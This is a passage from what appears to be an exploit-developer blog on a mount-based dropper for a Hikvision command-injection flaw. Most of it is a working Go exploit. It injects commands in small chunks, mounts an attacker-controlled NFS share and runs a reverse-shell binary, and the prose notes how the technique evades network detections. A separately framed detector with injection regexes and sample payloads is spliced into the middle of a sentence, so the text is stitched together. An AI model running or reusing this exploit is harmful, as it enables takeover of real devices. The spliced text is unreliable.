Additionally, this technique benefits from avoiding common network signatures, such as ",[1131,37761,37762],{},"TGI HUNT Curl to Bare IP Address",[47,37764,37766],{"href":37765},"#user-content-fn-11","11",[1131,37768,37769],{},"ET POLICY curl User-Agent Outbound",[47,37771,377],{"href":37772},"#user-content-fn-12"," that look for ",[886,37775,1553],{},[886,37777,1557],{}," on the network.",[18,37780,37781],{},"Below you can see how this attack would look if it were successful. The Wireshark traffic transitions from HTTP, to PortMap, to NFS.",[18,37783,37784],{},[68,37785],{":width":10862,"alt":37786,"src":37787},"Mount attack in Wireshark","\u002Fblog\u002Fhikvision-mount-shell\u002Fwireshark-exploit-with-mount.png",[18,37789,37790],{},"Overall, it’s a great little GTFOBin when options are limited. While server setup is a bit more involved than one might like, the technique benefits from being less common, and thus, less likely to trigger existing detections.",[1920,37792,37794],{"id":37793},"adding-the-technique-to-go-exploit","Adding the Technique to go-exploit",[18,37796,37797,37798,37801,37802,37807,37808,37810,37811,37814,37815,37817],{},"We found this technique useful enough to update VulnCheck’s open-source exploit framework, ",[47,37799,20558],{"href":14297,"rel":37800},[51],", to include a new binary dropper payload that ",[47,37803,37806],{"href":37804,"rel":37805},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F88ae33821ce659c3c42af0f4a9d864bb7e42861a\u002Fpayload\u002Fdropper\u002Funix.go#L64",[51],"implements"," this ",[886,37809,16339],{},"-based attack. Since we always strive to think and act like real attackers, we also developed a new variant of our ",[47,37812,37587],{"href":37585,"rel":37813},[51]," exploit for our customers that uses ",[886,37816,16339],{},". 
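The defender's side of the technique described above, as an added example that is not code from the page or from go-exploit: a small detector that pulls the injected command out of CVE-2021-36260 request bodies sent to `/SDK/webLanguage` and labels the three stages an attacker must go through when curl and wget are missing: the NFS mount dropper, the chunked `echo -n` writes used when the buffer is tiny, and the execution of a file staged earlier. The request bodies are constructed for the example (the NFS server 192.0.2.10 is an RFC 5737 documentation address, not an observed IOC); a real deployment would feed it bodies from a WAF, reverse proxy or canary log, and the extracted server and export path become the IOCs to pivot on, since no curl User-Agent or bare-IP HTTP request ever appears on the wire.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one detection result for a single PUT body to /SDK/webLanguage.
type Finding struct {
	Kind       string // nfs-mount-dropper, chunked-write, exec-staged-file or command-injection
	Command    string // the injected shell with the $( ) wrapper removed
	RemoteHost string // NFS server (nfs-mount-dropper only)
	Share      string // exported path on that server (nfs-mount-dropper only)
	MountPoint string // local directory the share is mounted on (nfs-mount-dropper only)
}

var (
	// The vulnerable field: anything inside $( ) in the <language> element.
	injectionRe = regexp.MustCompile(`(?s)<language\s*>\$\((.*)\)\s*</language>`)
	// mount [-o opts ...] <ipv4>:<export> <dir>; the mount point stops at ';' or whitespace.
	nfsMountRe = regexp.MustCompile(`\bmount\b(?:\s+-[A-Za-z]+\s+\S+)*\s+([0-9]{1,3}(?:\.[0-9]{1,3}){3}):(/[^\s;]*)\s+([^\s;]+)`)
	// echo -n '...' >file or >>file: the chunked-write pattern forced by the tiny buffer.
	chunkWriteRe = regexp.MustCompile(`\becho\s+-n\s+'[^']*'\s*>>?\s*[^\s;]+`)
	// Running something staged earlier: ./y, sh hik.sh, chmod +x y.
	execStagedRe = regexp.MustCompile(`(?:^|;\s*)(?:\./[^\s;]+|sh\s+[^\s;]+|chmod\s+\+x\s+[^\s;]+)`)
)

// sampleBodies are constructed request bodies, not captured traffic. The first
// mirrors the mount-based dropper shape; the last is a legitimate language change.
var sampleBodies = []string{
	`<xml><language >$(mkdir b; mount -o intr,nolock,tcp,exec 192.0.2.10:/srv/nfs/shared b; cd b; chmod 777 *;sh hik.sh;cd ../;rm -rf weblib/;rm -rf b)</language></xml>`,
	`<xml><language >$(echo -n 'mount -' >y)</language></xml>`,
	`<xml><language >$(chmod +x y)</language></xml>`,
	`<xml><language >$(./y)</language></xml>`,
	`<xml><language >en</language></xml>`,
}

// Classify assigns the most specific label to an injected command. A mount of a
// remote export wins over the other stages because it carries the useful IOCs.
func Classify(cmd string) Finding {
	f := Finding{Kind: "command-injection", Command: cmd}
	if m := nfsMountRe.FindStringSubmatch(cmd); m != nil {
		f.Kind, f.RemoteHost, f.Share, f.MountPoint = "nfs-mount-dropper", m[1], m[2], m[3]
		return f
	}
	if chunkWriteRe.MatchString(cmd) {
		f.Kind = "chunked-write"
		return f
	}
	if execStagedRe.MatchString(cmd) {
		f.Kind = "exec-staged-file"
	}
	return f
}

// Analyze runs the detector over request bodies and returns one Finding per body
// that carries a $( ) injection; bodies without one are benign language switches.
func Analyze(bodies []string) []Finding {
	var out []Finding
	for _, b := range bodies {
		m := injectionRe.FindStringSubmatch(b)
		if m == nil {
			continue
		}
		out = append(out, Classify(strings.TrimSpace(m[1])))
	}
	return out
}

func main() {
	for _, f := range Analyze(sampleBodies) {
		fmt.Printf("%-18s %s", f.Kind, f.Command)
		if f.Kind == "nfs-mount-dropper" {
			fmt.Printf("  [nfs server %s export %s mounted at %s]", f.RemoteHost, f.Share, f.MountPoint)
		}
		fmt.Println()
	}
}
```

The chunked-write and exec-staged labels matter on their own: a sequence of `echo -n` appends to one filename followed by `chmod +x` and `./` of that file is the same staging pattern whether the eventual payload is a mount, a printf-written stager, or a reverse shell, so alerting on the sequence catches variants that never contain the word `mount`.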
Because this is somewhat novel, we’re sharing most of the exploit implementation here:",[1354,37819,37821],{"className":19022,"code":37820,"language":19024,"meta":219,"style":219},"\u002F\u002F Send the exploit payload in the required HTTP PUT\nfunc send(url string, payload string) bool {\n    resp, bodyString, ok := protocol.HTTPSendAndRecv(\"PUT\", url, payload)\n    if !ok {\n        return false\n    }\n\n    if resp.StatusCode != 200 && resp.StatusCode != 500 {\n        output.PrintfError(\"Received an unexpected HTTP status code: %d\", resp.StatusCode)\n        return false\n    }\n\n    if !strings.Contains(bodyString, \"\u003CrequestURL>\u002FSDK\u002FwebLanguage\u003C\u002FrequestURL>\") {\n        output.PrintfError(\"Received an unexpected HTTP body: %s\", bodyString)\n        return false\n    }\n\n    return true\n}\n\nfunc (sploit HikvisionExploitMount) RunExploit(conf *config.Config) bool {\n    url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, \"\u002FSDK\u002FwebLanguage\")\n\n    switch conf.C2Type {\n    case c2.SimpleShellServer:\n        output.PrintfStatus(\"Sending a reverse shell payload for %s:%d\", conf.Lhost, conf.Lport)\n\n        \u002F\u002F generate a random directory to mount to\n        randDir := random.RandLetters(3)\n        mountCommand := dropper.Unix.Mountv3Only(conf.Lhost, conf.GetStringFlag(\"share\"), \".\u002F\"+randDir)\n\n        \u002F\u002F split the exploit into 7 byte chunks that we can append to a local script\n        mountSplit := splitByByteSize(mountCommand, 7)\n\n        \u002F\u002F the exploit space is very small (23 bytes) so break it up over multiple\n        \u002F\u002F requests. 
This will echo to a hard-coded filename (y).\n        if ok := send(url, \"\u003Cxml>\u003Clanguage >$(mkdir \"+randDir+\")\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n            return false\n        }\n        for i, entry := range mountSplit {\n            \u002F\u002F on the first exploit attempt, overwrite anything that might be in `y`\n            shAppend := \">>\"\n            if i == 0 {\n                shAppend = \">\"\n            }\n            if ok := send(url, \"\u003Cxml>\u003Clanguage >$(echo -n '\"+entry+\"'\"+shAppend+\"y)\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n                return false\n            }\n        }\n\n        \u002F\u002F execute the script\n        if ok := send(url, \"\u003Cxml>\u003Clanguage >$(chmod +x y)\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n            return false\n        }\n        if ok := send(url, \"\u003Cxml>\u003Clanguage >$(.\u002Fy)\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n            return false\n        }\n\n        \u002F\u002F execute the mounted binary\n        if ok := send(url, \"\u003Cxml>\u003Clanguage >$(.\u002F\"+randDir+\"\u002F\"+conf.GetStringFlag(\"exploit\")+\n            \")\u003C\u002Flanguage>\u003C\u002Fxml>\"); !ok {\n            return false\n        }\n    default:\n        output.PrintError(\"Invalid payload\")\n        return false\n    }\n\n    return true\n}\n",[886,37822,37823,37828,37854,37897,37907,37913,37917,37921,37952,37986,37992,37996,38000,38031,38057,38063,38067,38071,38078,38082,38086,38124,38174,38178,38192,38207,38251,38255,38260,38281,38343,38347,38352,38374,38378,38383,38388,38432,38438,38442,38465,38470,38483,38496,38509,38513,38571,38578,38582,38586,38590,38595,38626,38632,38636,38667,38673,38677,38681,38686,38742,38759,38765,38769,38776,38795,38801,38805,38809,38815],{"__ignoreMap":219},[1373,37824,37825],{"class":1375,"line":1376},[1373,37826,37827],{"class":4630},"\u002F\u002F Send the exploit payload in the required HTTP 
PUT\n",[1373,37829,37830,37832,37835,37837,37839,37841,37843,37846,37848,37850,37852],{"class":1375,"line":220},[1373,37831,19088],{"class":1397},[1373,37833,37834],{"class":7297}," send",[1373,37836,1384],{"class":1383},[1373,37838,7585],{"class":19096},[1373,37840,15757],{"class":7293},[1373,37842,5437],{"class":1383},[1373,37844,37845],{"class":19096}," payload",[1373,37847,15757],{"class":7293},[1373,37849,2230],{"class":1383},[1373,37851,16303],{"class":7293},[1373,37853,4765],{"class":1383},[1373,37855,37856,37859,37861,37864,37866,37868,37870,37872,37874,37877,37879,37881,37884,37886,37888,37891,37893,37895],{"class":1375,"line":1266},[1373,37857,37858],{"class":4640},"    resp",[1373,37860,5437],{"class":1383},[1373,37862,37863],{"class":4640}," bodyString",[1373,37865,5437],{"class":1383},[1373,37867,20610],{"class":4640},[1373,37869,20584],{"class":1397},[1373,37871,20615],{"class":4640},[1373,37873,59],{"class":1383},[1373,37875,37876],{"class":7297},"HTTPSendAndRecv",[1373,37878,1384],{"class":1383},[1373,37880,183],{"class":1387},[1373,37882,37883],{"class":1391},"PUT",[1373,37885,183],{"class":1387},[1373,37887,5437],{"class":1383},[1373,37889,37890],{"class":4640}," url",[1373,37892,5437],{"class":1383},[1373,37894,37845],{"class":4640},[1373,37896,11875],{"class":1383},[1373,37898,37899,37901,37903,37905],{"class":1375,"line":1852},[1373,37900,4695],{"class":4636},[1373,37902,7370],{"class":1397},[1373,37904,20662],{"class":4640},[1373,37906,8904],{"class":1383},[1373,37908,37909,37911],{"class":1375,"line":4692},[1373,37910,4918],{"class":4636},[1373,37912,16195],{"class":14985},[1373,37914,37915],{"class":1375,"line":4724},[1373,37916,4795],{"class":1383},[1373,37918,37919],{"class":1375,"line":4756},[1373,37920,6520],{"emptyLinePlaceholder":237},[1373,37922,37923,37925,37928,37930,37933,37935,37937,37939,37941,37943,37945,37947,37950],{"class":1375,"line":4768},[1373,37924,4695],{"class":4636},[1373,37926,37927],{"class":4640}," 
resp",[1373,37929,59],{"class":1383},[1373,37931,37932],{"class":4640},"StatusCode ",[1373,37934,15677],{"class":1397},[1373,37936,6610],{"class":5467},[1373,37938,16622],{"class":1397},[1373,37940,37927],{"class":4640},[1373,37942,59],{"class":1383},[1373,37944,37932],{"class":4640},[1373,37946,15677],{"class":1397},[1373,37948,37949],{"class":5467}," 500",[1373,37951,4765],{"class":1383},[1373,37953,37954,37957,37959,37962,37964,37966,37969,37973,37975,37977,37979,37981,37984],{"class":1375,"line":4792},[1373,37955,37956],{"class":4640},"        output",[1373,37958,59],{"class":1383},[1373,37960,37961],{"class":7297},"PrintfError",[1373,37963,1384],{"class":1383},[1373,37965,183],{"class":1387},[1373,37967,37968],{"class":1391},"Received an unexpected HTTP status code: ",[1373,37970,37972],{"class":37971},"sYoWi","%d",[1373,37974,183],{"class":1387},[1373,37976,5437],{"class":1383},[1373,37978,37927],{"class":4640},[1373,37980,59],{"class":1383},[1373,37982,37983],{"class":4640},"StatusCode",[1373,37985,11875],{"class":1383},[1373,37987,37988,37990],{"class":1375,"line":4798},[1373,37989,4918],{"class":4636},[1373,37991,16195],{"class":14985},[1373,37993,37994],{"class":1375,"line":4806},[1373,37995,4795],{"class":1383},[1373,37997,37998],{"class":1375,"line":4817},[1373,37999,6520],{"emptyLinePlaceholder":237},[1373,38001,38002,38004,38006,38009,38011,38013,38015,38018,38020,38022,38025,38027,38029],{"class":1375,"line":4825},[1373,38003,4695],{"class":4636},[1373,38005,7370],{"class":1397},[1373,38007,38008],{"class":4640},"strings",[1373,38010,59],{"class":1383},[1373,38012,17107],{"class":7297},[1373,38014,1384],{"class":1383},[1373,38016,38017],{"class":4640},"bodyString",[1373,38019,5437],{"class":1383},[1373,38021,4883],{"class":1387},[1373,38023,38024],{"class":1391},"\u003CrequestURL>\u002FSDK\u002FwebLanguage\u003C\u002FrequestURL>",[1373,38026,183],{"class":1387},[1373,38028,2230],{"class":1383},[1373,38030,4765],{"class":1383},[1373,38032,38033,38035,3
8037,38039,38041,38043,38046,38049,38051,38053,38055],{"class":1375,"line":4835},[1373,38034,37956],{"class":4640},[1373,38036,59],{"class":1383},[1373,38038,37961],{"class":7297},[1373,38040,1384],{"class":1383},[1373,38042,183],{"class":1387},[1373,38044,38045],{"class":1391},"Received an unexpected HTTP body: ",[1373,38047,38048],{"class":37971},"%s",[1373,38050,183],{"class":1387},[1373,38052,5437],{"class":1383},[1373,38054,37863],{"class":4640},[1373,38056,11875],{"class":1383},[1373,38058,38059,38061],{"class":1375,"line":4843},[1373,38060,4918],{"class":4636},[1373,38062,16195],{"class":14985},[1373,38064,38065],{"class":1375,"line":4849},[1373,38066,4795],{"class":1383},[1373,38068,38069],{"class":1375,"line":4877},[1373,38070,6520],{"emptyLinePlaceholder":237},[1373,38072,38073,38075],{"class":1375,"line":4915},[1373,38074,7340],{"class":4636},[1373,38076,38077],{"class":14985}," true\n",[1373,38079,38080],{"class":1375,"line":4931},[1373,38081,1855],{"class":1383},[1373,38083,38084],{"class":1375,"line":4947},[1373,38085,6520],{"emptyLinePlaceholder":237},[1373,38087,38088,38090,38092,38095,38098,38100,38103,38105,38108,38110,38113,38115,38118,38120,38122],{"class":1375,"line":4952},[1373,38089,19088],{"class":1397},[1373,38091,4641],{"class":1383},[1373,38093,38094],{"class":19096},"sploit ",[1373,38096,38097],{"class":14938},"HikvisionExploitMount",[1373,38099,2230],{"class":1383},[1373,38101,38102],{"class":7297}," 
RunExploit",[1373,38104,1384],{"class":1383},[1373,38106,38107],{"class":19096},"conf",[1373,38109,19113],{"class":1397},[1373,38111,38112],{"class":14938},"config",[1373,38114,59],{"class":1383},[1373,38116,38117],{"class":14938},"Config",[1373,38119,2230],{"class":1383},[1373,38121,16303],{"class":7293},[1373,38123,4765],{"class":1383},[1373,38125,38126,38129,38131,38133,38135,38137,38139,38141,38143,38146,38148,38150,38152,38155,38157,38159,38161,38164,38166,38168,38170,38172],{"class":1375,"line":6776},[1373,38127,38128],{"class":4640},"    url ",[1373,38130,20584],{"class":1397},[1373,38132,20615],{"class":4640},[1373,38134,59],{"class":1383},[1373,38136,20638],{"class":7297},[1373,38138,1384],{"class":1383},[1373,38140,38107],{"class":4640},[1373,38142,59],{"class":1383},[1373,38144,38145],{"class":4640},"Rhost",[1373,38147,5437],{"class":1383},[1373,38149,20633],{"class":4640},[1373,38151,59],{"class":1383},[1373,38153,38154],{"class":4640},"Rport",[1373,38156,5437],{"class":1383},[1373,38158,20633],{"class":4640},[1373,38160,59],{"class":1383},[1373,38162,38163],{"class":4640},"SSL",[1373,38165,5437],{"class":1383},[1373,38167,4883],{"class":1387},[1373,38169,37657],{"class":1391},[1373,38171,183],{"class":1387},[1373,38173,11875],{"class":1383},[1373,38175,38176],{"class":1375,"line":6781},[1373,38177,6520],{"emptyLinePlaceholder":237},[1373,38179,38180,38183,38185,38187,38190],{"class":1375,"line":7524},[1373,38181,38182],{"class":4636},"    switch",[1373,38184,20633],{"class":4640},[1373,38186,59],{"class":1383},[1373,38188,38189],{"class":4640},"C2Type ",[1373,38191,8904],{"class":1383},[1373,38193,38194,38197,38200,38202,38205],{"class":1375,"line":7530},[1373,38195,38196],{"class":4636},"    case",[1373,38198,38199],{"class":4640}," 
c2",[1373,38201,59],{"class":1383},[1373,38203,38204],{"class":4640},"SimpleShellServer",[1373,38206,11747],{"class":1383},[1373,38208,38209,38211,38213,38216,38218,38220,38223,38225,38227,38229,38231,38233,38235,38237,38240,38242,38244,38246,38249],{"class":1375,"line":7546},[1373,38210,37956],{"class":4640},[1373,38212,59],{"class":1383},[1373,38214,38215],{"class":7297},"PrintfStatus",[1373,38217,1384],{"class":1383},[1373,38219,183],{"class":1387},[1373,38221,38222],{"class":1391},"Sending a reverse shell payload for ",[1373,38224,38048],{"class":37971},[1373,38226,4606],{"class":1391},[1373,38228,37972],{"class":37971},[1373,38230,183],{"class":1387},[1373,38232,5437],{"class":1383},[1373,38234,20633],{"class":4640},[1373,38236,59],{"class":1383},[1373,38238,38239],{"class":4640},"Lhost",[1373,38241,5437],{"class":1383},[1373,38243,20633],{"class":4640},[1373,38245,59],{"class":1383},[1373,38247,38248],{"class":4640},"Lport",[1373,38250,11875],{"class":1383},[1373,38252,38253],{"class":1375,"line":7571},[1373,38254,6520],{"emptyLinePlaceholder":237},[1373,38256,38257],{"class":1375,"line":7598},[1373,38258,38259],{"class":4630},"        \u002F\u002F generate a random directory to mount to\n",[1373,38261,38262,38265,38267,38270,38272,38275,38277,38279],{"class":1375,"line":7615},[1373,38263,38264],{"class":4640},"        randDir ",[1373,38266,20584],{"class":1397},[1373,38268,38269],{"class":4640}," random",[1373,38271,59],{"class":1383},[1373,38273,38274],{"class":7297},"RandLetters",[1373,38276,1384],{"class":1383},[1373,38278,491],{"class":5467},[1373,38280,11875],{"class":1383},[1373,38282,38283,38286,38288,38291,38293,38296,38298,38301,38303,38305,38307,38309,38311,38313,38315,38318,38320,38322,38325,38327,38329,38331,38334,38336,38338,38341],{"class":1375,"line":7635},[1373,38284,38285],{"class":4640},"        mountCommand ",[1373,38287,20584],{"class":1397},[1373,38289,38290],{"class":4640}," 
dropper",[1373,38292,59],{"class":1383},[1373,38294,38295],{"class":4640},"Unix",[1373,38297,59],{"class":1383},[1373,38299,38300],{"class":7297},"Mountv3Only",[1373,38302,1384],{"class":1383},[1373,38304,38107],{"class":4640},[1373,38306,59],{"class":1383},[1373,38308,38239],{"class":4640},[1373,38310,5437],{"class":1383},[1373,38312,20633],{"class":4640},[1373,38314,59],{"class":1383},[1373,38316,38317],{"class":7297},"GetStringFlag",[1373,38319,1384],{"class":1383},[1373,38321,183],{"class":1387},[1373,38323,38324],{"class":1391},"share",[1373,38326,183],{"class":1387},[1373,38328,15534],{"class":1383},[1373,38330,4883],{"class":1387},[1373,38332,38333],{"class":1391},".\u002F",[1373,38335,183],{"class":1387},[1373,38337,15448],{"class":1397},[1373,38339,38340],{"class":4640},"randDir",[1373,38342,11875],{"class":1383},[1373,38344,38345],{"class":1375,"line":7640},[1373,38346,6520],{"emptyLinePlaceholder":237},[1373,38348,38349],{"class":1375,"line":7648},[1373,38350,38351],{"class":4630},"        \u002F\u002F split the exploit into 7 byte chunks that we can append to a local script\n",[1373,38353,38354,38357,38359,38362,38364,38367,38369,38372],{"class":1375,"line":7672},[1373,38355,38356],{"class":4640},"        mountSplit ",[1373,38358,20584],{"class":1397},[1373,38360,38361],{"class":7297}," splitByByteSize",[1373,38363,1384],{"class":1383},[1373,38365,38366],{"class":4640},"mountCommand",[1373,38368,5437],{"class":1383},[1373,38370,38371],{"class":5467}," 7",[1373,38373,11875],{"class":1383},[1373,38375,38376],{"class":1375,"line":7688},[1373,38377,6520],{"emptyLinePlaceholder":237},[1373,38379,38380],{"class":1375,"line":7709},[1373,38381,38382],{"class":4630},"        \u002F\u002F the exploit space is very small (23 bytes) so break it up over multiple\n",[1373,38384,38385],{"class":1375,"line":7714},[1373,38386,38387],{"class":4630},"        \u002F\u002F requests. 
This will echo to a hard-coded filename (y).\n",[1373,38389,38390,38392,38394,38396,38398,38400,38402,38404,38406,38409,38411,38413,38415,38417,38419,38422,38424,38426,38428,38430],{"class":1375,"line":7722},[1373,38391,9773],{"class":4636},[1373,38393,20610],{"class":4640},[1373,38395,20584],{"class":1397},[1373,38397,37834],{"class":7297},[1373,38399,15969],{"class":1383},[1373,38401,7585],{"class":4640},[1373,38403,5437],{"class":1383},[1373,38405,4883],{"class":1387},[1373,38407,38408],{"class":1391},"\u003Cxml>\u003Clanguage >$(mkdir ",[1373,38410,183],{"class":1387},[1373,38412,15448],{"class":1397},[1373,38414,38340],{"class":4640},[1373,38416,15448],{"class":1397},[1373,38418,183],{"class":1387},[1373,38420,38421],{"class":1391},")\u003C\u002Flanguage>\u003C\u002Fxml>",[1373,38423,183],{"class":1387},[1373,38425,2344],{"class":1383},[1373,38427,7370],{"class":1397},[1373,38429,20662],{"class":4640},[1373,38431,8904],{"class":1383},[1373,38433,38434,38436],{"class":1375,"line":9903},[1373,38435,9896],{"class":4636},[1373,38437,16195],{"class":14985},[1373,38439,38440],{"class":1375,"line":9908},[1373,38441,9861],{"class":1383},[1373,38443,38444,38447,38450,38452,38455,38457,38460,38463],{"class":1375,"line":9913},[1373,38445,38446],{"class":4636},"        for",[1373,38448,38449],{"class":4640}," i",[1373,38451,5437],{"class":1383},[1373,38453,38454],{"class":4640}," entry ",[1373,38456,20584],{"class":1397},[1373,38458,38459],{"class":4636}," range",[1373,38461,38462],{"class":4640}," mountSplit ",[1373,38464,8904],{"class":1383},[1373,38466,38467],{"class":1375,"line":9932},[1373,38468,38469],{"class":4630},"            \u002F\u002F on the first exploit attempt, overwrite anything that might be in `y`\n",[1373,38471,38472,38475,38477,38479,38481],{"class":1375,"line":9937},[1373,38473,38474],{"class":4640},"            shAppend 
",[1373,38476,20584],{"class":1397},[1373,38478,4883],{"class":1387},[1373,38480,15038],{"class":1391},[1373,38482,19057],{"class":1387},[1373,38484,38485,38487,38490,38492,38494],{"class":1375,"line":9957},[1373,38486,9793],{"class":4636},[1373,38488,38489],{"class":4640}," i ",[1373,38491,15920],{"class":1397},[1373,38493,5557],{"class":5467},[1373,38495,4765],{"class":1383},[1373,38497,38498,38501,38503,38505,38507],{"class":1375,"line":9962},[1373,38499,38500],{"class":4640},"                shAppend ",[1373,38502,5417],{"class":1397},[1373,38504,4883],{"class":1387},[1373,38506,5384],{"class":1391},[1373,38508,19057],{"class":1387},[1373,38510,38511],{"class":1375,"line":15955},[1373,38512,9832],{"class":1383},[1373,38514,38515,38517,38519,38521,38523,38525,38527,38529,38531,38534,38536,38538,38541,38543,38545,38547,38549,38551,38554,38556,38558,38561,38563,38565,38567,38569],{"class":1375,"line":16030},[1373,38516,9793],{"class":4636},[1373,38518,20610],{"class":4640},[1373,38520,20584],{"class":1397},[1373,38522,37834],{"class":7297},[1373,38524,15969],{"class":1383},[1373,38526,7585],{"class":4640},[1373,38528,5437],{"class":1383},[1373,38530,4883],{"class":1387},[1373,38532,38533],{"class":1391},"\u003Cxml>\u003Clanguage >$(echo -n '",[1373,38535,183],{"class":1387},[1373,38537,15448],{"class":1397},[1373,38539,38540],{"class":4640},"entry",[1373,38542,15448],{"class":1397},[1373,38544,183],{"class":1387},[1373,38546,1388],{"class":1391},[1373,38548,183],{"class":1387},[1373,38550,15448],{"class":1397},[1373,38552,38553],{"class":4640},"shAppend",[1373,38555,15448],{"class":1397},[1373,38557,183],{"class":1387},[1373,38559,38560],{"class":1391},"y)\u003C\u002Flanguage>\u003C\u002Fxml>",[1373,38562,183],{"class":1387},[1373,38564,2344],{"class":1383},[1373,38566,7370],{"class":1397},[1373,38568,20662],{"class":4640},[1373,38570,8904],{"class":1383},[1373,38572,38573,38576],{"class":1375,"line":16035},[1373,38574,38575],{"class":4636},"                
return",[1373,38577,16195],{"class":14985},[1373,38579,38580],{"class":1375,"line":16083},[1373,38581,9832],{"class":1383},[1373,38583,38584],{"class":1375,"line":16098},[1373,38585,9861],{"class":4640},[1373,38587,38588],{"class":1375,"line":16103},[1373,38589,6520],{"emptyLinePlaceholder":237},[1373,38591,38592],{"class":1375,"line":16147},[1373,38593,38594],{"class":4630},"        \u002F\u002F execute the script\n",[1373,38596,38597,38599,38601,38603,38605,38607,38609,38611,38613,38616,38618,38620,38622,38624],{"class":1375,"line":16153},[1373,38598,9773],{"class":4636},[1373,38600,20610],{"class":4640},[1373,38602,20584],{"class":1397},[1373,38604,37834],{"class":7297},[1373,38606,15969],{"class":1383},[1373,38608,7585],{"class":4640},[1373,38610,5437],{"class":1383},[1373,38612,4883],{"class":1387},[1373,38614,38615],{"class":1391},"\u003Cxml>\u003Clanguage >$(chmod +x y)\u003C\u002Flanguage>\u003C\u002Fxml>",[1373,38617,183],{"class":1387},[1373,38619,2344],{"class":1383},[1373,38621,7370],{"class":1397},[1373,38623,20662],{"class":4640},[1373,38625,8904],{"class":1383},[1373,38627,38628,38630],{"class":1375,"line":16164},[1373,38629,9896],{"class":4636},[1373,38631,16195],{"class":14985},[1373,38633,38634],{"class":1375,"line":16170},[1373,38635,9861],{"class":1383},[1373,38637,38638,38640,38642,38644,38646,38648,38650,38652,38654,38657,38659,38661,38663,38665],{"class":1375,"line":16187},[1373,38639,9773],{"class":4636},[1373,38641,20610],{"class":4640},[1373,38643,20584],{"class":1397},[1373,38645,37834],{"class":7297},[1373,38647,15969],{"class":1383},[1373,38649,7585],{"class":4640},[1373,38651,5437],{"class":1383},[1373,38653,4883],{"class":1387},[1373,38655,38656],{"class":1391},"\u003Cxml>\u003Clanguage 
>$(.\u002Fy)\u003C\u002Flanguage>\u003C\u002Fxml>",[1373,38658,183],{"class":1387},[1373,38660,2344],{"class":1383},[1373,38662,7370],{"class":1397},[1373,38664,20662],{"class":4640},[1373,38666,8904],{"class":1383},[1373,38668,38669,38671],{"class":1375,"line":16198},[1373,38670,9896],{"class":4636},[1373,38672,16195],{"class":14985},[1373,38674,38675],{"class":1375,"line":16204},[1373,38676,9861],{"class":1383},[1373,38678,38679],{"class":1375,"line":16210},[1373,38680,6520],{"emptyLinePlaceholder":237},[1373,38682,38683],{"class":1375,"line":16254},[1373,38684,38685],{"class":4630},"        \u002F\u002F execute the mounted binary\n",[1373,38687,38688,38690,38692,38694,38696,38698,38700,38702,38704,38707,38709,38711,38713,38715,38717,38719,38721,38723,38725,38727,38729,38731,38733,38735,38737,38739],{"class":1375,"line":18499},[1373,38689,9773],{"class":4636},[1373,38691,20610],{"class":4640},[1373,38693,20584],{"class":1397},[1373,38695,37834],{"class":7297},[1373,38697,15969],{"class":1383},[1373,38699,7585],{"class":4640},[1373,38701,5437],{"class":1383},[1373,38703,4883],{"class":1387},[1373,38705,38706],{"class":1391},"\u003Cxml>\u003Clanguage >$(.\u002F",[1373,38708,183],{"class":1387},[1373,38710,15448],{"class":1397},[1373,38712,38340],{"class":4640},[1373,38714,15448],{"class":1397},[1373,38716,183],{"class":1387},[1373,38718,2180],{"class":1391},[1373,38720,183],{"class":1387},[1373,38722,15448],{"class":1397},[1373,38724,38107],{"class":4640},[1373,38726,59],{"class":1383},[1373,38728,38317],{"class":7297},[1373,38730,1384],{"class":1383},[1373,38732,183],{"class":1387},[1373,38734,22852],{"class":1391},[1373,38736,183],{"class":1387},[1373,38738,2230],{"class":1383},[1373,38740,38741],{"class":1397},"+\n",[1373,38743,38744,38747,38749,38751,38753,38755,38757],{"class":1375,"line":18504},[1373,38745,38746],{"class":1387},"            
\"",[1373,38748,38421],{"class":1391},[1373,38750,183],{"class":1387},[1373,38752,2344],{"class":1383},[1373,38754,7370],{"class":1397},[1373,38756,20662],{"class":4640},[1373,38758,8904],{"class":1383},[1373,38760,38761,38763],{"class":1375,"line":18517},[1373,38762,9896],{"class":4636},[1373,38764,16195],{"class":14985},[1373,38766,38767],{"class":1375,"line":18529},[1373,38768,9861],{"class":1383},[1373,38770,38771,38774],{"class":1375,"line":18541},[1373,38772,38773],{"class":4636},"    default",[1373,38775,11747],{"class":1383},[1373,38777,38778,38780,38782,38784,38786,38788,38791,38793],{"class":1375,"line":18562},[1373,38779,37956],{"class":4640},[1373,38781,59],{"class":1383},[1373,38783,20674],{"class":7297},[1373,38785,1384],{"class":1383},[1373,38787,183],{"class":1387},[1373,38789,38790],{"class":1391},"Invalid payload",[1373,38792,183],{"class":1387},[1373,38794,11875],{"class":1383},[1373,38796,38797,38799],{"class":1375,"line":18578},[1373,38798,4918],{"class":4636},[1373,38800,16195],{"class":14985},[1373,38802,38803],{"class":1375,"line":18583},[1373,38804,4795],{"class":4640},[1373,38806,38807],{"class":1375,"line":18600},[1373,38808,6520],{"emptyLinePlaceholder":237},[1373,38810,38811,38813],{"class":1375,"line":18605},[1373,38812,7340],{"class":4636},[1373,38814,38077],{"class":14985},[1373,38816,38817],{"class":1375,"line":18630},[1373,38818,1855],{"class":4640},[18,38820,38821],{},"Running this exploit drops a shell script onto the Hikvision system. When executed, the script mounts an attacker-controlled NFS share and runs an attacker-controlled executable.",[18,38823,38824,38825,38828,38829,38832],{},"Setting up an NFS share to support this exploit is straightforward. In an ideal world, we’d just use go-nfs",[47,38826,872],{"href":38827},"#user-content-fn-13",", but it doesn’t seem compatible with the Hikvision system. Instead, using ",[886,38830,38831],{},"nfs-kernel-server"," is relatively painless. 
